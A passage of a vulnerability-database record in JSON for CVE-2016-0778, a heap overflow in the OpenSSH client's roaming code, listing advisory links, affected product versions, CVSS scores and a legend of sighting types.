"FEDORA-2016-2e89eba0c1", "refsource": "FEDORA", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-February/176516.html" }, { "name": "https://bto.bluecoat.com/security-advisory/sa109", "refsource": "CONFIRM", "url": "https://bto.bluecoat.com/security-advisory/sa109" }, { "name": "1034671", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id/1034671" }, { "name": "openSUSE-SU-2016:0127", "refsource": "SUSE", "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00013.html" }, { "name": "GLSA-201601-01", "refsource": "GENTOO", "url": "https://security.gentoo.org/glsa/201601-01" }, { "name": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05390722", "refsource": "CONFIRM", "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05390722" }, { "name": "[oss-security] 20160114 Qualys Security Advisory - Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778", "refsource": "MLIST", "url": "http://www.openwall.com/lists/oss-security/2016/01/14/7" }, { "name": "20160115 Qualys Security Advisory - Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778", "refsource": "FULLDISC", "url": "http://seclists.org/fulldisclosure/2016/Jan/44" }, { "name": "SUSE-SU-2016:0119", "refsource": "SUSE", "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00008.html" }, { "name": "http://packetstormsecurity.com/files/135273/Qualys-Security-Advisory-OpenSSH-Overflow-Leak.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/135273/Qualys-Security-Advisory-OpenSSH-Overflow-Leak.html" }, { "name": "SUSE-SU-2016:0118", "refsource": "SUSE", "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00007.html" }, { "name": "SUSE-SU-2016:0120", "refsource": "SUSE", "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00009.html" }, { "name": "USN-2869-1", "refsource": "UBUNTU", "url": "http://www.ubuntu.com/usn/USN-2869-1" }, { "name": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05356388", "refsource": "CONFIRM", "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05356388" }, { "name": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html", "refsource": "CONFIRM", "url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html" }, { "name": "DSA-3446", "refsource": "DEBIAN", "url": "http://www.debian.org/security/2016/dsa-3446" }, { "name": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf", "refsource": "CONFIRM", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" } ] } }, "nvd.nist.gov": { "configurations": { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.4:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.2:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.8:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.7:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.1:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.5:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.3:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.0:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.6:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.9:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.6:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.0:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.4:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.1:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.5:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.8:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.2:p2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.9:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.7:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "10.9.5", "versionStartIncluding": "10.9.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "10.10.5", "versionStartIncluding": "10.10.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "10.11.3", "versionStartIncluding": "10.11.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:hp:virtual_customer_access_system:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "15.07", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sophos:unified_threat_management_software:9.353:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] }, "cve": { "CVE_data_meta": { "ASSIGNER": "secalert@redhat.com", "ID": "CVE-2016-0778" }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "en", "value": "The (1) roaming_read and (2) roaming_write functions in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2, when certain proxy and forward options are enabled, do not properly maintain connection file descriptors, which allows remote servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact by requesting many forwardings." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "en", "value": "CWE-119" } ] } ] }, "references": { "reference_data": [ { "name": "http://www.openssh.com/txt/release-7.1p2", "refsource": "CONFIRM", "tags": [ "Patch", "Release Notes", "Vendor Advisory" ], "url": "http://www.openssh.com/txt/release-7.1p2" }, { "name": "[oss-security] 20160114 Qualys Security Advisory - Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778", "refsource": "MLIST", "tags": [ "Exploit", "Mailing List", "Technical Description", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2016/01/14/7" }, { "name": "https://support.apple.com/HT206167", "refsource": "CONFIRM", "tags": [ "Vendor Advisory" ], "url": "https://support.apple.com/HT206167" }, { "name": "APPLE-SA-2016-03-21-5", "refsource": "APPLE", "tags": [ "Mailing List", "Release Notes", "Third Party Advisory" ], "url": "http://lists.apple.com/archives/security-announce/2016/Mar/msg00004.html" }, { "name": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/", "refsource": "CONFIRM", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/" }, { "name": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/", "refsource": "CONFIRM", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/" }, { "name": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05247375", "refsource": "CONFIRM", "tags": [ "Third Party Advisory" ], "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05247375" }, { "name": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html", "refsource": "CONFIRM", "tags": [ "Third Party Advisory" ], "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html" }, { "name": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html", "refsource": "CONFIRM", "tags": [ "Third Party Advisory" ], "url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html" }, { "name": "80698", "refsource": "BID", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/80698" }, { "name": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10734", "refsource": "CONFIRM", "tags": [ "Third Party Advisory" ], "url": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10734" }, { "name": "FEDORA-2016-2e89eba0c1", "refsource": "FEDORA", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-February/176516.html" }, { "name": "openSUSE-SU-2016:0127", "refsource": "SUSE", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00013.html" }, { "name": "SUSE-SU-2016:0119", "refsource": "SUSE", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00008.html" }, { "name": "SUSE-SU-2016:0117", "refsource": "SUSE", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00006.html" }, { "name": "20160115 Qualys Security Advisory - Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778", "refsource": "FULLDISC", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2016/Jan/44" }, { "name": "https://bto.bluecoat.com/security-advisory/sa109", "refsource": "CONFIRM", "tags": [ "Third Party Advisory" ], "url": "https://bto.bluecoat.com/security-advisory/sa109" }, { "name": "DSA-3446", "refsource": "DEBIAN", "tags": [ "Third Party Advisory" ], "url": "http://www.debian.org/security/2016/dsa-3446" }, { "name": "USN-2869-1", "refsource": "UBUNTU", "tags": [ "Third Party Advisory" ], "url": "http://www.ubuntu.com/usn/USN-2869-1" }, { "name": "GLSA-201601-01", "refsource": "GENTOO", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/201601-01" }, { "name": "1034671", "refsource": "SECTRACK", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securitytracker.com/id/1034671" }, { "name": "SUSE-SU-2016:0118", "refsource": "SUSE", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00007.html" }, { "name": "openSUSE-SU-2016:0128", "refsource": "SUSE", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00014.html" }, { "name": "SUSE-SU-2016:0120", "refsource": "SUSE", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00009.html" }, { "name": "http://packetstormsecurity.com/files/135273/Qualys-Security-Advisory-OpenSSH-Overflow-Leak.html", "refsource": "MISC", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/135273/Qualys-Security-Advisory-OpenSSH-Overflow-Leak.html" }, { "name": "FEDORA-2016-4556904561", "refsource": "FEDORA", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/176349.html" }, { "name": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05356388", "refsource": "CONFIRM", "tags": [ "Third Party Advisory" ], "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05356388" }, { "name": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05385680", "refsource": "CONFIRM", "tags": [ "Third Party Advisory" ], "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05385680" }, { "name": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05390722", "refsource": "CONFIRM", "tags": [ "Third Party Advisory" ], "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05390722" }, { "name": "20160114 Qualys Security Advisory - Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778", "refsource": "BUGTRAQ", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/archive/1/537295/100/0/threaded" }, { "name": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" } ] } }, "impact": { "baseMetricV2": { "acInsufInfo": false, "cvssV2": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:H/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false }, "baseMetricV3": { "cvssV3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 2.2, "impactScore": 5.9 } }, "lastModifiedDate": "2022-12-13T12:15Z", "publishedDate": "2016-01-14T22:59Z" } } }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.